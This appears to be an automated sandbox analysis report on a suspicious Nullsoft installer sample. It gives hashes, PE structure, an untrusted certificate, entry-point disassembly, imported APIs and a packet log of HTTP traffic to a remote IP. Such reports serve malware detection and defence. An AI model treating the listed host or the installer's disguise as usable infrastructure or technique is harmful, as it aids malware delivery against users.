                                                Encrypted:false
                                                SSDEEP:96:zVcGBUehj1kyKmuE7RQZCEDc+IEtesKRLiyEqDmPIse:zVZBUevkBrCEDUE0DDmwse
                                                MD5:845A86A79FBA340CEF7233C6518F3D22
                                                SHA1:F8B8886D7E1ACCC8E025A78CB2940992E7D4DD71
                                                SHA-256:19B54368C848A4E46BF93C1BB3D4BF47B1FF965CAAB64D9099258B9B6B61CE76
                                                SHA-512:5C65FF32D15FB7EC3E0CE22F985222A069DFB1BFE636140E2DF85B22AD3998E062C76B4418FBBB3FF7953D71960E824EA7A27F161A22C4C9E32BD78934D84878
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):394
                                                Entropy (8bit):4.308939576739245
                                                Encrypted:false
                                                SSDEEP:12:5g2BJo6CWZ0LCc+TeGDQnPZnoxlOLMpkMJLLa37z9n:5DEX+6ZpUlOg6MJLYz9n
                                                MD5:DB59B30B63B1BB25574E79623913DF27
                                                SHA1:7BB0493C43C972B6B78B870B66F3BF093A85116D
                                                SHA-256:225D132CEF9273EE87874A67240E568E5F1D6A8056D531D66BEABCA99675CB7F
                                                SHA-512:9037D859F1F714E5910386D39C01A4DB429E80E16AE76AB077DAB56394A1CBC998F65199547CE8ADE833D8DF34AAFCAEB0D4C052E50D9F7DF74EEB0D4CDE1050
                                                Malicious:false
                                                Preview:neurologiske harmonierne subdiversify lablab skovbyggelinies watts samlivsforholdene appendiksen gyniatry afgiftsomraaderne farmaci..anklung emders udgangsvrdiernes.frijordens brnestolenes totaktere hyperspeculative fancifulness magnetstribes rgforgiftning.korruptionernes christences genanvendelsesloven spasmers discour pachometer,blodbgen cliqueyness afgiftsbelagt.startlers gagerne motoric,
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.1313111477846975
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Uundgaaelige.exe
                                                File size:554'400 bytes
                                                MD5:fc55407cc82612103c5971dca1837d6b
                                                SHA1:01efa90009900c64c846b7ac716dea3c5f97c4e8
                                                SHA256:c9736cdc4ade9fddb9b293e0366f182f972154d98169b58e532b7905c310bf97
                                                SHA512:08edfa8f06459ae170ea444664776e57836bd6142721d8df663776051c8c6dab98f7c8902848ed08e4311a858d95eb38d0df13208f8e0144a2fa9fa1a90c0240
                                                SSDEEP:12288:WDkS/CNT9fM913qbLd+cUQj5X7JPKmdE9s4Jr:WDEc9tqb5akVPHE93N
                                                TLSH:0AC412423151D9A3DFA00E710E6AC6DDDBB7BC2829B0721B3BD0B7CE3972252854B765
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...s..Y.................b.........
                                                Icon Hash:87352d170d0b2503
                                                Entrypoint:0x40330d
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x597FCC73 [Tue Aug 1 00:33:55 2017 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:57e98d9a5a72c8d7ad8fb7a6a58b3daf
                                                Signature Valid:false
                                                Signature Issuer:E=Tricolour@Joyous118.Un, O=anaphoria, OU="Stttepartis Pseudoreminiscence ", CN=anaphoria, L=Utica, S=New York, C=US
                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                Error Number:-2146762487
                                                Not Before, Not After
                                                • 30/07/2023 10:55:23 29/07/2026 10:55:23
                                                Subject Chain
                                                • E=Tricolour@Joyous118.Un, O=anaphoria, OU="Stttepartis Pseudoreminiscence ", CN=anaphoria, L=Utica, S=New York, C=US
                                                Version:3
                                                Thumbprint MD5:3EE53EC21955AB0E20ABCB915D367D9A
                                                Thumbprint SHA-1:23865187AA8B142BFD3EAC6FD00AE8BF690248DF
                                                Thumbprint SHA-256:D1FFB2E4EE839C9F49D329D641E537DF2654D965AB5BE7A98073EC515661FCE4
                                                Serial:199D3723AB0A401FE7D7C8539C59029292ED0D3A
                                                Instruction
                                                sub esp, 00000184h
                                                push ebx
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+18h], ebx
                                                mov dword ptr [esp+10h], 0040A130h
                                                mov dword ptr [esp+20h], ebx
                                                mov byte ptr [esp+14h], 00000020h
                                                call dword ptr [004080A8h]
                                                call dword ptr [004080A4h]
                                                and eax, BFFFFFFFh
                                                cmp ax, 00000006h
                                                mov dword ptr [0042472Ch], eax
                                                je 00007F8D38D5E3B3h
                                                push ebx
                                                call 00007F8D38D61482h
                                                cmp eax, ebx
                                                je 00007F8D38D5E3A9h
                                                push 00000C00h
                                                call eax
                                                mov esi, 00408298h
                                                push esi
                                                call 00007F8D38D613FEh
                                                push esi
                                                call dword ptr [004080A0h]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], bl
                                                jne 00007F8D38D5E38Dh
                                                push 0000000Ah
                                                call 00007F8D38D61456h
                                                push 00000008h
                                                call 00007F8D38D6144Fh
                                                push 00000006h
                                                mov dword ptr [00424724h], eax
                                                call 00007F8D38D61443h
                                                cmp eax, ebx
                                                je 00007F8D38D5E3B1h
                                                push 0000001Eh
                                                call eax
                                                test eax, eax
                                                je 00007F8D38D5E3A9h
                                                or byte ptr [0042472Fh], 00000040h
                                                push ebp
                                                call dword ptr [00408044h]
                                                push ebx
                                                call dword ptr [00408288h]
                                                mov dword ptr [004247F8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+38h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 0041FCF0h
                                                call dword ptr [00408178h]
                                                push 0040A1ECh
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8428 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x35000 | 0x28370 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x86b80 | 0xa20 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x603c | 0x6200 | 029c8031e2fb36630bb7ccb6d1d379b5 | False | 0.6572464923469388 | data | 6.39361655287636 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1248 | 0x1400 | 421f9404c16c75fa4bc7d37da19b3076 | False | 0.4287109375 | data | 5.044261339836676 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x1a838 | 0x400 | c93d53142ea782e156ddc6acebdf883d | False | 0.6455078125 | data | 5.223134318413766 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x25000 | 0x10000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x35000 | 0x28370 | 0x28400 | 71c120af5143c141f14fdc9f8575c42b | False | 0.37851805124223603 | data | 3.8555632401143507 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x35358 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.33547261327339406
RT_ICON | 0x45b80 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.38453857473197395
RT_ICON | 0x4f028 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.4072550831792976
RT_ICON | 0x544b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.3952527161076996
RT_ICON | 0x586d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.44439834024896263
RT_ICON | 0x5ac80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4955440900562852
RT_ICON | 0x5bd28 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5508196721311476
RT_ICON | 0x5c6b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6329787234042553
RT_DIALOG | 0x5cb18 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x5cc18 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x5cd38 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x5ce00 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x5ce60 | 0x76 | data | English | United States | 0.7457627118644068
RT_VERSION | 0x5ced8 | 0x158 | 370 sysV pure executable not stripped | English | United States | 0.5581395348837209
RT_MANIFEST | 0x5d030 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
DLL | Import
KERNEL32.dll | SetEnvironmentVariableA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, Sleep, GetTickCount, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, SetCurrentDirectoryA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, GlobalUnlock, GetDiskFreeSpaceA, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Jul 15, 2024 09:23:56.223370075 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.223423004 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223444939 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223458052 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223468065 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.223469973 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223481894 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223495007 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223506927 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223519087 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223676920 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.223712921 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223726034 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223737001 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223748922 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223759890 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223814964 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.223880053 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.223973036 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.412447929 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412465096 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412583113 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412595034 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412621021 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412632942 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412643909 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412677050 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412688971 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412698030 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.412700891 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412748098 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.412758112 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412812948 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.412868023 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.412889004 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412916899 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412929058 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412940025 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412951946 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412983894 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.413058996 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.413156986 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.413395882 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413412094 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413508892 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413633108 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.413681030 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.413753033 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413767099 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413790941 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413804054 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413815975 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413829088 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413850069 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413861990 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413866997 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.413875103 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413897991 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413911104 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413923025 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413940907 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413944960 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.413954020 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413965940 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413997889 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414010048 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414021015 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414031982 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414051056 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414093971 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414148092 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414160013 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414171934 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414199114 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414208889 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414220095 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414256096 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414267063 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414285898 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414299965 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414324999 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414360046 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414371014 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414382935 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414386988 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414395094 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414408922 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414419889 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414432049 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414452076 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414452076 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414463997 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414475918 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414586067 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414597988 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414697886 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414720058 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414762974 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414774895 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414786100 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414789915 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414843082 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414866924 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414896011 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414933920 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414958000 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414958954 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414971113 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414994001 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415005922 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415016890 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415036917 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.415039062 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415050983 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415062904 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415092945 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415101051 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.415111065 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415139914 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415165901 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415270090 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.415394068 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.603301048 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.603393078 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.603450060 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.603559017 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.603821993 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.603882074 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.603894949 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.603982925 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.604038954 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604094028 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604099035 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.604105949 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604116917 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604144096 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604156017 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604166031 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.604167938 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604228020 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604239941 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604252100 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604264021 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604281902 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604293108 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604304075 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604315042 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604336023 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604347944 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604358912 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604371071 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604408979 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604537010 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604564905 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.604594946 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604607105 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604618073 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604641914 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604652882 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604665041 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604682922 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604693890 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.604693890 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604706049 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604717016 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604810953 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.604825974 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604837894 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604849100 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604861021 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604892015 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.604963064 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604990959 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.605022907 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.605035067 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.605072021 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.605084896 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.605115891 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.605129004 CEST8049859209.90.237.48192.168.11.30
